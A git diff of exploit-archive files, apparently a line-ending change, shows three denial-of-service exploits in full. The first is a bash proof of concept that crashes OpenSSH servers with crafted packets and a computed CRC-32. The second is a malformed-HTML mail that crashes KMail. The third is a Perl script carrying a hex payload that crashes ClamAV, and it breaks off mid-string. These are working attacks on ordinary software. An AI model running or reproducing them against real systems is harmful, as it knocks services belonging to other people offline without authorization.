-printf "[*] Attacking %s...\n" $hostname >&2 - -# launch netcat coprocess -(nc -q0 $hostname $port < $fifo.in > $fifo.out; rm -f $fifo.in $fifo.out) & - -# open file descriptors to coprocess -exec 3>${fifo}.in 4<${fifo}.out - -# send identification -printf "SSH-1.8-OpenSSH DoS Demo -- taviso@google.com\n" >&3 - -# read server key and spoof bytes (i only care about the spoof bytes) -read server_identification <&4 -printf "[*] remote server identifies as %s.\n" "${server_identification}" >&2 - -# read the cookie -cookie="$(hexdump -n 18 -e '"" 8/1 "%02x " " "'<&4 | cut -d" " -f11-18)" - -printf "[*] IP spoofing cookie was %s.\n" "${cookie}" >&2 - -# now send my response -printf "\x00\x00\x08\x3d" >&3 # packet length -printf "\x00\x00\x00\x03" >&3 # packet type -printf "\x03" >&3 # cipher type - -# print spoof bytes -printf "\x${cookie// /\x}" >&3 - -# now calculate checksum of spoof bytes -for i in ${cookie}; do - declare -i buf=0x${i} - let 'crc = crc32tab[(crc ^ buf) & 0xff] ^ (crc >> 8)' -done - -# now send some random crap for padding. -for ((i = 0; i < 2095; i++)); do - printf "\x41" >&3 - let 'crc = crc32tab[(crc ^ 0x41) & 0xff] ^ (crc >> 8)' -done - -printf "[*] checksum should be %#x\n" $crc >&2 - -# now send the checksum to server -printf "$(printf "\\\x%x\\\x%x\\\x%x\\\x%x" $(((crc >> 24) & 0xff)) \ - $(((crc >> 16) & 0xff)) \ - $(((crc >> 8) & 0xff)) \ - $(((crc >> 0) & 0xff)))" >&3 - -printf "\x00\x03\xff\xf8" >&3 # packet length - -# junk -perl -e 'print "\x00"x"262144"' >&3 - -# close file descriptors -exec 3>&- 4<&- - -printf "[*] All done.\n" >&2 - -# milw0rm.com [2006-09-27] +#!/bin/bash +# +# OpenSSH CRC compensation attack detection DoS PoC. +# Tavis Ormandy +# +# Yes, I really did implement crc-32 in bash. +# +# usage: script + +# victim hostname +hostname=${1:-localhost} +port=${2:-22} + +# where the fifo is created to communicate with netcat +fifo=/tmp/nc.$$ + +# make the fifos +mkfifo ${fifo}.in +mkfifo ${fifo}.out + +# pre-calculated crc32 for packet header +declare -i crc=0xb2240279 + +# crc lookup table +declare -a crc32tab=( 0x00000000 0x77073096 0xee0e612c 0x990951ba 0x076dc419 + 0x706af48f 0xe963a535 0x9e6495a3 0x0edb8832 0x79dcb8a4 0xe0d5e91e 0x97d2d988 + 0x09b64c2b 0x7eb17cbd 0xe7b82d07 0x90bf1d91 0x1db71064 0x6ab020f2 0xf3b97148 + 0x84be41de 0x1adad47d 0x6ddde4eb 0xf4d4b551 0x83d385c7 0x136c9856 0x646ba8c0 + 0xfd62f97a 0x8a65c9ec 0x14015c4f 0x63066cd9 0xfa0f3d63 0x8d080df5 0x3b6e20c8 + 0x4c69105e 0xd56041e4 0xa2677172 0x3c03e4d1 0x4b04d447 0xd20d85fd 0xa50ab56b + 0x35b5a8fa 0x42b2986c 0xdbbbc9d6 0xacbcf940 0x32d86ce3 0x45df5c75 0xdcd60dcf + 0xabd13d59 0x26d930ac 0x51de003a 0xc8d75180 0xbfd06116 0x21b4f4b5 0x56b3c423 + 0xcfba9599 0xb8bda50f 0x2802b89e 0x5f058808 0xc60cd9b2 0xb10be924 0x2f6f7c87 + 0x58684c11 0xc1611dab 0xb6662d3d 0x76dc4190 0x01db7106 0x98d220bc 0xefd5102a + 0x71b18589 0x06b6b51f 0x9fbfe4a5 0xe8b8d433 0x7807c9a2 0x0f00f934 0x9609a88e + 0xe10e9818 0x7f6a0dbb 0x086d3d2d 0x91646c97 0xe6635c01 0x6b6b51f4 0x1c6c6162 + 0x856530d8 0xf262004e 0x6c0695ed 0x1b01a57b 0x8208f4c1 0xf50fc457 0x65b0d9c6 + 0x12b7e950 0x8bbeb8ea 0xfcb9887c 0x62dd1ddf 0x15da2d49 0x8cd37cf3 0xfbd44c65 + 0x4db26158 0x3ab551ce 0xa3bc0074 0xd4bb30e2 0x4adfa541 0x3dd895d7 0xa4d1c46d + 0xd3d6f4fb 0x4369e96a 0x346ed9fc 0xad678846 0xda60b8d0 0x44042d73 0x33031de5 + 0xaa0a4c5f 0xdd0d7cc9 0x5005713c 0x270241aa 0xbe0b1010 0xc90c2086 0x5768b525 + 0x206f85b3 0xb966d409 0xce61e49f 0x5edef90e 0x29d9c998 0xb0d09822 0xc7d7a8b4 + 0x59b33d17 0x2eb40d81 0xb7bd5c3b 0xc0ba6cad 0xedb88320 0x9abfb3b6 0x03b6e20c + 0x74b1d29a 0xead54739 0x9dd277af 0x04db2615 0x73dc1683 0xe3630b12 0x94643b84 + 0x0d6d6a3e 0x7a6a5aa8 0xe40ecf0b 0x9309ff9d 0x0a00ae27 0x7d079eb1 0xf00f9344 + 0x8708a3d2 0x1e01f268 0x6906c2fe 0xf762575d 0x806567cb 0x196c3671 0x6e6b06e7 + 0xfed41b76 0x89d32be0 0x10da7a5a 0x67dd4acc 0xf9b9df6f 0x8ebeeff9 0x17b7be43 + 0x60b08ed5 0xd6d6a3e8 0xa1d1937e 0x38d8c2c4 0x4fdff252 0xd1bb67f1 0xa6bc5767 + 0x3fb506dd 0x48b2364b 0xd80d2bda 0xaf0a1b4c 0x36034af6 0x41047a60 0xdf60efc3 + 0xa867df55 0x316e8eef 0x4669be79 0xcb61b38c 0xbc66831a 0x256fd2a0 0x5268e236 + 0xcc0c7795 0xbb0b4703 0x220216b9 0x5505262f 0xc5ba3bbe 0xb2bd0b28 0x2bb45a92 + 0x5cb36a04 0xc2d7ffa7 0xb5d0cf31 0x2cd99e8b 0x5bdeae1d 0x9b64c2b0 0xec63f226 + 0x756aa39c 0x026d930a 0x9c0906a9 0xeb0e363f 0x72076785 0x05005713 0x95bf4a82 + 0xe2b87a14 0x7bb12bae 0x0cb61b38 0x92d28e9b 0xe5d5be0d 0x7cdcefb7 0x0bdbdf21 + 0x86d3d2d4 0xf1d4e242 0x68ddb3f8 0x1fda836e 0x81be16cd 0xf6b9265b 0x6fb077e1 + 0x18b74777 0x88085ae6 0xff0f6a70 0x66063bca 0x11010b5c 0x8f659eff 0xf862ae69 + 0x616bffd3 0x166ccf45 0xa00ae278 0xd70dd2ee 0x4e048354 0x3903b3c2 0xa7672661 + 0xd06016f7 0x4969474d 0x3e6e77db 0xaed16a4a 0xd9d65adc 0x40df0b66 0x37d83bf0 + 0xa9bcae53 0xdebb9ec5 0x47b2cf7f 0x30b5ffe9 0xbdbdf21c 0xcabac28a 0x53b39330 + 0x24b4a3a6 0xbad03605 0xcdd70693 0x54de5729 0x23d967bf 0xb3667a2e 0xc4614ab8 + 0x5d681b02 0x2a6f2b94 0xb40bbe37 0xc30c8ea1 0x5a05df1b 0x2d02ef8d ); + +printf "[*] OpenSSH Pre-Auth DoS PoC by taviso@google.com\n" >&2 +printf "[*] Attacking %s...\n" $hostname >&2 + +# launch netcat coprocess +(nc -q0 $hostname $port < $fifo.in > $fifo.out; rm -f $fifo.in $fifo.out) & + +# open file descriptors to coprocess +exec 3>${fifo}.in 4<${fifo}.out + +# send identification +printf "SSH-1.8-OpenSSH DoS Demo -- taviso@google.com\n" >&3 + +# read server key and spoof bytes (i only care about the spoof bytes) +read server_identification <&4 +printf "[*] remote server identifies as %s.\n" "${server_identification}" >&2 + +# read the cookie +cookie="$(hexdump -n 18 -e '"" 8/1 "%02x " " "'<&4 | cut -d" " -f11-18)" + +printf "[*] IP spoofing cookie was %s.\n" "${cookie}" >&2 + +# now send my response +printf "\x00\x00\x08\x3d" >&3 # packet length +printf "\x00\x00\x00\x03" >&3 # packet type +printf "\x03" >&3 # cipher type + +# print spoof bytes +printf "\x${cookie// /\x}" >&3 + +# now calculate checksum of spoof bytes +for i in ${cookie}; do + declare -i buf=0x${i} + let 'crc = crc32tab[(crc ^ buf) & 0xff] ^ (crc >> 8)' +done + +# now send some random crap for padding. +for ((i = 0; i < 2095; i++)); do + printf "\x41" >&3 + let 'crc = crc32tab[(crc ^ 0x41) & 0xff] ^ (crc >> 8)' +done + +printf "[*] checksum should be %#x\n" $crc >&2 + +# now send the checksum to server +printf "$(printf "\\\x%x\\\x%x\\\x%x\\\x%x" $(((crc >> 24) & 0xff)) \ + $(((crc >> 16) & 0xff)) \ + $(((crc >> 8) & 0xff)) \ + $(((crc >> 0) & 0xff)))" >&3 + +printf "\x00\x03\xff\xf8" >&3 # packet length + +# junk +perl -e 'print "\x00"x"262144"' >&3 + +# close file descriptors +exec 3>&- 4<&- + +printf "[*] All done.\n" >&2 + +# milw0rm.com [2006-09-27] diff --git a/platforms/multiple/dos/2515.txt b/platforms/multiple/dos/2515.txt index 59335d7dc..435ef4333 100755 --- a/platforms/multiple/dos/2515.txt +++ b/platforms/multiple/dos/2515.txt @@ -1,37 +1,37 @@ -nnp [at] silenthack.co.uk -http://silenthack.co.uk - -Kmail <= 1.9.1 (latest) suffers from a crash when trying to parse an -incorrectly formatted tag. HTML parsing must be enabled for -this. This can be done by going to Settings -> Configure Kmail -->Security -> and tick Prefer HTML to Plain Text. - -Copy the following into your local /var/spool/mail/`whoami` or send a -mail containing the HTML part to cause a crash. - -#-#-#-#-#-#-#-#-#-#-#-#-#-#-# - -return-Path: -X-Original-To: nnp -Delivered-To: nnp@torvalds -Received: by torvalds (Postfix, from userid 1000) - id 2341B7CC25; Sun, 27 Aug 2006 01:03:35 +0100 (IST) -To: nnp@torvalds -Message-Id: <20060827000335.2341B7CC25@torvalds> -Date: Sun, 27 Aug 2006 01:03:35 +0100 (IST) -Content-Type: text/html -From: nnp@torvalds (nnp) -Status: RO -X-Status: UC -X-KMail-EncryptionState: -X-KMail-SignatureState: -X-KMail-MDN-Sent: - - - - - - -#-#-#-#-#-#-#-#-#-#-#-#-#-#-# - -# milw0rm.com [2006-10-11] +nnp [at] silenthack.co.uk +http://silenthack.co.uk + +Kmail <= 1.9.1 (latest) suffers from a crash when trying to parse an +incorrectly formatted tag. HTML parsing must be enabled for +this. This can be done by going to Settings -> Configure Kmail +->Security -> and tick Prefer HTML to Plain Text. + +Copy the following into your local /var/spool/mail/`whoami` or send a +mail containing the HTML part to cause a crash. + +#-#-#-#-#-#-#-#-#-#-#-#-#-#-# + +return-Path: +X-Original-To: nnp +Delivered-To: nnp@torvalds +Received: by torvalds (Postfix, from userid 1000) + id 2341B7CC25; Sun, 27 Aug 2006 01:03:35 +0100 (IST) +To: nnp@torvalds +Message-Id: <20060827000335.2341B7CC25@torvalds> +Date: Sun, 27 Aug 2006 01:03:35 +0100 (IST) +Content-Type: text/html +From: nnp@torvalds (nnp) +Status: RO +X-Status: UC +X-KMail-EncryptionState: +X-KMail-SignatureState: +X-KMail-MDN-Sent: + + + + + + +#-#-#-#-#-#-#-#-#-#-#-#-#-#-# + +# milw0rm.com [2006-10-11] diff --git a/platforms/multiple/dos/2586.pl b/platforms/multiple/dos/2586.pl index f021e88be..a0cd8d832 100755 --- a/platforms/multiple/dos/2586.pl +++ b/platforms/multiple/dos/2586.pl @@ -1,188 +1,188 @@ -#!/usr/bin/perl -# -# Clam AntiVirus ClamAV CHM Chunk Name Length DoS Vulnerability -# Took Damian Put's poc and shortened it just a little. -# All credits to Damian Put (pucik[at]gazeta.pl) (pucik[@]overflow.pl) www.overflow.pl -# /str0ke - -my $clam = -"\x49\x54\x53\x46\x03\x00\x00\x00\x60\x00\x00\x00\x01\x00\x00\x00\x4E\x77\xBC\x98\x15\x04\x00\x00\x10". -"\xFD\x01\x7C\xAA\x7B\xD0\x11\x9E\x0C\x00\xA0\xC9\x22\xE6\xEC\x11\xFD\x01\x7C\xAA\x7B\xD0\x11\x9E\x0C". -"\x00\xA0\xC9\x22\xE6\xEC\x60\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00". -"\x00\x00\x00\x00\x00\x54\x30\x00\x00\x00\x00\x00\x00\xCC\x30\x00\x00\x00\x00\x00\x00\xFE\x01\x00\x00". -"\x00\x00\x00\x00\xEB\x19\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x49\x54\x53\x50\x01". -"\x00\x00\x00\x54\x00\x00\x00\x0A\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x02\x00". -"\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xFF\xFF\xFF\xFF\x03\x00\x00\x00\x09\x04\x00\x00\x6A\x92\x02". -"\x5D\x2E\x21\xD0\x11\x9D\xF9\x00\xA0\xC9\x22\xE6\xEC\x54\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF". -"\xFF\xFF\xFF\xFF\x50\x4D\x47\x4C\x53\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x01\xFF\xFF\xFF\x01". -"\x2F\x00\x00\x00\xFF\xC0\xFF\xFF\x44\x58\x48\x44\x52\x01\xCE\xB0\x02\xA0\x00\x08\x2F\x23\x49\x54\x42". -"\x49\x54\x53\x00\x00\x00\x09\x2F\x23\x53\x54\x52\x49\x4E\x47\x53\x01\xCE\xE6\x6B\x8E\x5F\x08\x2F\x23". -"\x53\x59\x53\x54\x45\x4D\x00\x83\x6E\x7F\x08\x2F\x23\x54\x4F\x50\x49\x43\x53\x01\xCE\xD0\x02\x87\x10". -"\x08\x2F\x23\x55\x52\x4C\x53\x54\x52\x01\xCE\xDC\x3E\x8A\x08\x2F\x23\x55\x52\x4C\x54\x42\x4C\x01\xCE". -"\xD7\x12\x85\x2C\x09\x2F\x23\x57\x49\x4E\x44\x4F\x57\x53\x01\xC8\x93\x78\x81\x44\x0B\x2F\x24\x46\x49". -"\x66\x74\x69\x4D\x61\x69\x6E\x01\xC8\xAA\x2B\x86\x85\x57\x09\x2F\x24\x4F\x42\x4A\x49\x4E\x53\x54\x01". -"\x77\x69\x73\x65\x2E\x68\x74\x6D\x01\x8D\xB5\x4C\xA2\x09\x0B\x2F\x73\x6F\x75\x72\x63\x65\x2E\x68\x74". -"\x6D\x01\x8D\xD7\x55\x95\x28\x0A\x2F\x73\x74\x61\x72\x74\x2E\x68\x74\x6D\x01\x8D\xEC\x7D\xAF\x0C\x16". -"\x2F\x54\x61\x62\x6C\x65\x20\x6F\x66\x20\x43\x6F\x6E\x74\x65\x6E\x74\x73\x2E\x68\x68\x63\x01\x93\x99". -"\x21\xC8\x6D\x0A\x2F\x74\x6F\x6F\x6C\x73\x2E\x68\x74\x6D\x01\x8E\x9C\x09\xA5\x6D\x14\x2F\x74\x72\x6F". -"\x75\x62\x6C\x65\x73\x68\x6F\x6F\x74\x69\x6E\x67\x2E\x68\x74\x6D\x01\x92\xA8\x25\xC7\x7F\x12\x2F\x75". -"\x70\x64\x61\x74\x65\x5F\x73\x65\x72\x76\x65\x72\x2E\x68\x74\x6D\x01\x8E\xC1\x76\xA1\x57\x0F\x2F\x75". -"\x73\x65\x64\x5F\x66\x69\x6C\x65\x73\x2E\x68\x74\x6D\x01\x90\xD2\x57\xD6\x27\x0E\x2F\x77\x65\x62\x73". -"\x65\x72\x76\x65\x72\x2E\x68\x74\x6D\x01\x90\xBC\x1E\x96\x39\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". -"\x00\x00\x00\x00\x00\x00\x00\x3A\x0F\xD6\x0E\x72\x0E\x06\x0E\x8E\x0D\x1D\x0D\xB3\x0C\x5B\x0C\xD9\x0B". -"\x60\x0B\xDD\x0A\x48\x0A\xC8\x09\x4B\x09\xAD\x08\x1E\x08\x88\x07\x04\x07\x80\x06\xFF\x05\x7E\x05\xE2". -"\x04\x4D\x04\xD1\x03\x59\x03\xCE\x02\x45\x02\x98\x01\x47\x01\xE8\x00\x8D\x00\x3D\x00\xA4\x00\x50\x4D". -"\x47\x4C\x43\x0E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x14\x3A\x3A\x44\x61\x74\x61". -"\x53\x70\x61\x63\x65\x2F\x4E\x61\x6D\x65\x4C\x69\x73\x74\x00\x00\x3C\x28\x3A\x3A\x44\x61\x74\x61\x53". -"\x70\x61\x63\x65\x2F\x53\x74\x6F\x72\x61\x67\x65\x2F\x4D\x53\x43\x6F\x6D\x70\x72\x65\x73\x73\x65\x64". -"\x2F\x43\x6F\x6E\x74\x65\x6E\x74\x00\x84\x6D\xB3\xCD\x32\x2C\x3A\x3A\x44\x61\x74\x61\x53\x70\x61\x63". -"\x65\x2F\x53\x74\x6F\x72\x61\x67\x65\x2F\x4D\x53\x43\x6F\x6D\x70\x72\x65\x73\x73\x65\x64\x2F\x43\x6F". -"\x6E\x74\x72\x6F\x6C\x44\x61\x74\x61\x00\x6A\x1C\x29\x3A\x3A\x44\x61\x74\x61\x53\x70\x61\x63\x65\x2F". -"\x53\x74\x6F\x72\x61\x67\x65\x2F\x4D\x53\x43\x6F\x6D\x70\x72\x65\x73\x73\x65\x64\x2F\x53\x70\x61\x6E". -"\x49\x6E\x66\x6F\x00\x62\x08\x2F\x3A\x3A\x44\x61\x74\x61\x53\x70\x61\x63\x65\x2F\x53\x74\x6F\x72\x61". -"\x67\x65\x2F\x4D\x53\x43\x6F\x6D\x70\x72\x65\x73\x73\x65\x64\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D". -"\x2F\x4C\x69\x73\x74\x00\x3C\x26\x5F\x3A\x3A\x44\x61\x74\x61\x53\x70\x61\x63\x65\x2F\x53\x74\x6F\x72". -"\x61\x67\x65\x2F\x4D\x53\x43\x6F\x6D\x70\x72\x65\x73\x73\x65\x64\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72". -"\x6D\x2F\x7B\x37\x46\x43\x32\x38\x39\x34\x30\x2D\x39\x44\x33\x31\x2D\x31\x31\x44\x30\x2D\x39\x42\x32". -"\x37\x2D\x30\x30\x41\x30\x43\x39\x31\x45\x39\x43\x37\x43\x7D\x2F\x49\x6E\x73\x74\x61\x6E\x63\x65\x44". -"\x61\x74\x61\x2F\x00\x00\x00\x69\x3A\x3A\x44\x61\x74\x61\x53\x70\x61\x63\x65\x2F\x53\x74\x6F\x72\x61". -"\x67\x65\x2F\x4D\x53\x43\x6F\x6D\x70\x72\x65\x73\x73\x65\x64\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D". -"\x2F\x7B\x37\x46\x43\x32\x38\x39\x34\x30\x2D\x39\x44\x33\x31\x2D\x31\x31\x44\x30\x2D\x39\x42\x32\x37". -"\x2D\x30\x30\x41\x30\x43\x39\x31\x45\x39\x43\x37\x43\x7D\x2F\x49\x6E\x73\x74\x61\x6E\x63\x65\x44\x61". -"\x74\x61\x2F\x52\x65\x73\x65\x74\x54\x61\x62\x6C\x65\x00\x81\x06\x82\x68\x65\x72\x76\x65\x72\x2E\x6A". -"\x70\x67\x01\xBC\xBB\x6B\x9F\x59\x1F\x2F\x69\x6D\x67\x2F\x32\x32\x62\x5F\x65\x6E\x5F\x73\x65\x72\x76". -"\x65\x72\x5F\x70\x72\x69\x6F\x72\x69\x74\x79\x2E\x6A\x70\x67\x01\xAE\xE3\x7F\xFE\x1E\x20\x2F\x69\x6D". -"\x67\x2F\x32\x32\x62\x5F\x65\x6E\x5F\x75\x70\x64\x61\x74\x65\x5F\x73\x65\x72\x76\x65\x72\x6D\x65\x74". -"\x2E\x6A\x70\x67\x01\x95\x9B\x4B\x97\x7E\x1B\x2F\x69\x6D\x67\x2F\x32\x35\x61\x5F\x63\x6F\x6E\x74\x65". -"\x78\x74\x5F\x73\x6F\x75\x72\x63\x65\x2E\x6A\x70\x67\x01\x96\x89\x38\xB7\x30\x17\x2F\x69\x6D\x67\x2F". -"\x32\x35\x61\x5F\x71\x75\x65\x75\x65\x5F\x6C\x69\x73\x74\x2E\x6A\x70\x67\x01\xB1\xD9\x01\xF4\x37\x23". -"\x2F\x69\x6D\x67\x2F\x32\x35\x62\x5F\x70\x72\x65\x66\x5F\x73\x65\x72\x76\x65\x72\x5F\x6C\x69\x73\x74". -"\x62\x75\x74\x74\x6F\x6E\x2E\x6A\x70\x67\x01\xAE\xD9\x75\x8A\x0A\x10\x2F\x69\x6D\x67\x2F\x61\x64\x64". -"\x72\x65\x6D\x31\x2E\x67\x69\x66\x01\x99\xF0\x34\x81\x98\x4D\x10\x2F\x69\x6D\x67\x2F\x61\x64\x64\x72". -"\x65\x6D\x32\x2E\x67\x69\x66\x01\x9B\x89\x01\xFF\x6E\x0E\x2F\x69\x6D\x67\x2F\x61\x72\x72\x6F\x77\x2E". -"\x67\x69\x66\x01\xC0\xAF\x70\x3E\x15\x2F\x69\x6D\x67\x2F\x62\x61\x72\x5F\x6F\x62\x74\x61\x69\x6E\x65". -"\x64\x2E\x6A\x70\x67\x01\xB1\xC5\x59\x89\x76\x18\x2F\x69\x6D\x67\x2F\x62\x61\x72\x5F\x73\x68\x61\x72". -"\x65\x64\x66\x69\x6C\x65\x73\x2E\x6A\x70\x67\x01\xB1\xCF\x4F\x89\x32\x18\x2F\x69\x6D\x67\x2F\x62\x61". -"\x72\x5F\x73\x6F\x75\x72\x63\x65\x5F\x66\x6C\x61\x74\x2E\x6A\x70\x67\x01\xB1\xAA\x10\x8F\x24\x1A\x2F". -"\x69\x6D\x67\x2F\x62\x61\x72\x5F\x73\x6F\x75\x72\x63\x65\x5F\x73\x68\x61\x64\x65\x64\x2E\x6A\x70\x67". -"\x01\xB1\xB9\x34\x8C\x25\x13\x2F\x69\x6D\x67\x2F\x62\x6E\x5F\x63\x6F\x6E\x6E\x65\x63\x74\x2E\x6A\x70". -"\x67\x01\x95\xB3\x49\x89\x2D\x0B\x2F\x69\x6D\x67\x2F\x62\x72\x2E\x6A\x70\x67\x01\xB9\xBB\x07\xBB\x69". -"\x01\xB1\x98\x4F\x91\x41\x1C\x2F\x69\x6D\x67\x2F\x65\x44\x32\x4B\x6C\x69\x6E\x6B\x73\x5F\x75\x6E\x63". -"\x68\x65\x63\x6B\x65\x64\x2E\x6A\x70\x67\x01\x93\xE2\x0E\x8C\x74\x16\x2F\x69\x6D\x67\x2F\x65\x44\x6F". -"\x6E\x6B\x65\x79\x48\x79\x62\x72\x69\x64\x2E\x6A\x70\x67\x01\x97\xE7\x48\x87\x34\x17\x2F\x69\x6D\x67". -"\x2F\x66\x69\x65\x6E\x64\x73\x5F\x63\x6F\x6E\x74\x65\x78\x74\x2E\x6A\x70\x67\x01\x96\xC0\x68\xC6\x09". -"\x69\x6D\x67\x2F\x66\x72\x69\x65\x6E\x64\x73\x33\x2E\x6A\x70\x67\x01\x97\x86\x71\x8A\x1E\x0B\x2F\x69". -"\x6D\x67\x2F\x69\x70\x2E\x67\x69\x66\x01\x9D\x8B\x29\xA5\x2D\x1D\x2F\x69\x6D\x67\x2F\x6C\x69\x6E\x6B". -"\x73\x79\x73\x5F\x70\x6F\x72\x74\x5F\x74\x72\x69\x67\x67\x65\x72\x2E\x6A\x70\x67\x01\xA1\xD2\x1E\x82". -"\xEB\x4F\x13\x2F\x69\x6D\x67\x2F\x6C\x69\x73\x74\x5F\x6B\x6E\x6F\x77\x6E\x2E\x6A\x70\x67\x01\xC0\xBD". -"\x4E\x8E\x03\x15\x2F\x69\x6D\x67\x2F\x6C\x69\x73\x74\x5F\x6F\x6E\x71\x75\x65\x75\x65\x2E\x6A\x70\x67". -"\x01\xC0\xB0\x2E\x8D\x20\x14\x2F\x69\x6D\x67\x2F\x6C\x69\x73\x74\x5F\x75\x70\x6C\x6F\x61\x64\x2E\x6A". -"\x70\x67\x01\xC0\xA2\x43\x8D\x2D\x0F\x2F\x69\x6D\x67\x2F\x6D\x6C\x64\x6F\x6E\x6B\x2E\x6A\x70\x67\x01". -"\x97\xDC\x76\x85\x21\x11\x2F\x69\x6D\x67\x2F\x6D\x70\x65\x6E\x64\x69\x6E\x67\x2E\x6A\x70\x67\x01\x97". -"\xC0\x51\x85\x15\x15\x2F\x69\x6D\x67\x2F\x6D\x75\x6C\x65\x5F\x54\x72\x5F\x67\x72\x65\x79\x2E\x6A\x70". -"\x67\x01\x98\xA8\x6E\x85\x16\x16\x2F\x69\x6D\x67\x2F\x6D\x75\x6C\x65\x5F\x54\x72\x5F\x4C\x6F\x77\x49". -"\x44\x2E\x6A\x70\x67\x01\x98\xA0\x10\x88\x5E\x16\x2F\x69\x6D\x67\x2F\x6D\x75\x6C\x65\x5F\x54\x72\x61". -"\x79\x49\x63\x6F\x6E\x2E\x6A\x70\x67\x01\x98\x9A\x69\x85\x27\x10\x2F\x69\x6D\x67\x2F\x6E\x65\x74\x63". -"\x6F\x6E\x73\x2E\x67\x69\x66\x01\x99\xAB\x77\xC4\x3D\x10\x2F\x69\x6D\x67\x2F\x6E\x65\x75\x74\x72\x61". -"\x6C\x2E\x6A\x70\x67\x01\x97\xC5\x66\x85\x08\x15\x2F\x69\x6D\x67\x2F\x6E\x6F\x74\x63\x6F\x6E\x6E\x65". -"\x63\x74\x65\x64\x2E\x6A\x70\x67\x01\x98\x92\x7E\x87\x6B\x0D\x2F\x69\x6D\x67\x2F\x70\x6C\x75\x73\x2E". -"\x6A\x70\x67\x01\x97\xD2\x2E\x85\x1E\x12\x2F\x69\x6D\x67\x2F\x70\x6C\x75\x73\x63\x6F\x6D\x70\x61\x2E". -"\x6A\x70\x67\x01\x97\xD7\x4C\x85\x2A\x1A\x2F\x69\x6D\x67\x2F\x70\x6C\x75\x73\x65\x44\x6F\x6E\x6B\x65". -"\x79\x48\x79\x62\x72\x69\x64\x2E\x6A\x70\x67\x01\x97\xEE\x7C\x85\x2B\x13\x2F\x69\x6D\x67\x2F\x70\x6C". -"\x75\x73\x6D\x6C\x64\x6F\x6E\x6B\x2E\x6A\x70\x67\x01\x97\xE2\x17\x85\x31\x15\x2F\x69\x6D\x67\x2F\x70". -"\x6C\x75\x73\x73\x68\x61\x72\x65\x61\x7A\x61\x2E\x6A\x70\x67\x01\x97\xFE\x09\x8A\x09\x18\x2F\x69\x6D". -"\x67\x2F\x70\x72\x65\x66\x5F\x63\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x2E\x6A\x70\x67\x01\xA4\xBD\x6D". -"\x81\x82\x76\x19\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73". -"\x2E\x6A\x70\x67\x01\xA5\xC0\x63\x81\xA9\x2F\x15\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x64\x69\x73". -"\x70\x6C\x61\x79\x2E\x6A\x70\x67\x01\xC0\xCB\x51\xF9\x6D\x16\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F". -"\x65\x78\x74\x65\x6E\x64\x65\x64\x2E\x6A\x70\x67\x01\xA6\xEA\x12\x82\x81\x64\x13\x2F\x69\x6D\x67\x2F". -"\x70\x72\x65\x66\x5F\x66\x69\x6C\x65\x73\x2E\x6A\x70\x67\x01\xA8\xEB\x76\x82\x8E\x42\x15\x2F\x69\x6D". -"\x67\x2F\x70\x72\x65\x66\x5F\x67\x65\x6E\x65\x72\x61\x6C\x2E\x6A\x70\x67\x01\xAA\xFA\x38\xF8\x28\x11". -"\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x69\x72\x63\x2E\x6A\x70\x67\x01\xAB\xF2\x60\x81\x87\x1C\x1B". -"\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x6E\x6F\x74\x69\x66\x69\x63\x61\x74\x69\x6F\x6E\x73\x2E\x6A". -"\x70\x67\x01\xAC\xF9\x7C\xE1\x22\x13\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x70\x72\x6F\x78\x79\x2E". -"\x6A\x70\x67\x01\xC3\xEC\x68\xD4\x4B\x17\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x73\x63\x68\x65\x64". -"\x75\x6C\x65\x72\x2E\x6A\x70\x67\x01\xC4\xC1\x33\xEB\x4E\x16\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F". -"\x53\x65\x63\x75\x72\x69\x74\x79\x2E\x6A\x70\x67\x01\xBC\xDB\x44\x81\xD4\x19\x14\x2F\x69\x6D\x67\x2F". -"\x70\x72\x65\x66\x5F\x73\x65\x72\x76\x65\x72\x2E\x6A\x70\x67\x01\xAD\xDB\x1E\xFE\x57\x18\x2F\x69\x6D". -"\x67\x2F\x70\x72\x65\x66\x5F\x73\x74\x61\x74\x69\x73\x74\x69\x63\x73\x2E\x6A\x70\x67\x01\xAF\xE2\x1D". -"\x81\xA4\x57\x17\x2F\x69\x6D\x67\x2F\x70\x72\x65\x66\x5F\x77\x65\x62\x73\x65\x72\x76\x65\x72\x2E\x6A". -"\x70\x67\x01\xC1\xC5\x3E\xD1\x79\x1F\x2F\x69\x6D\x67\x2F\x50\x72\x65\x66\x65\x72\x65\x6E\x63\x65\x73". -"\x5F\x32\x34\x62\x5F\x77\x69\x7A\x61\x72\x64\x2E\x6A\x70\x67\x01\x93\xEF\x02\x81\xAC\x49\x0E\x2F\x69". -"\x6D\x67\x2F\x72\x61\x6E\x67\x65\x2E\x67\x69\x66\x01\xA0\xE0\x32\xF1\x6C\x0F\x2F\x69\x6D\x67\x2F\x52". -"\x61\x74\x69\x6E\x67\x2E\x6A\x70\x67\x01\x98\xAE\x04\x85\x2E\x13\x2F\x69\x6D\x67\x2F\x52\x61\x74\x69". -"\x6E\x67\x5F\x62\x61\x64\x2E\x6A\x70\x67\x01\x98\xB3\x32\x85\x49\x15\x2F\x69\x6D\x67\x2F\x73\x65\x63". -"\x75\x72\x65\x5F\x68\x61\x73\x68\x31\x2E\x6A\x70\x67\x01\xC5\xFB\x29\xB2\x58\x15\x2F\x69\x6D\x67\x2F". 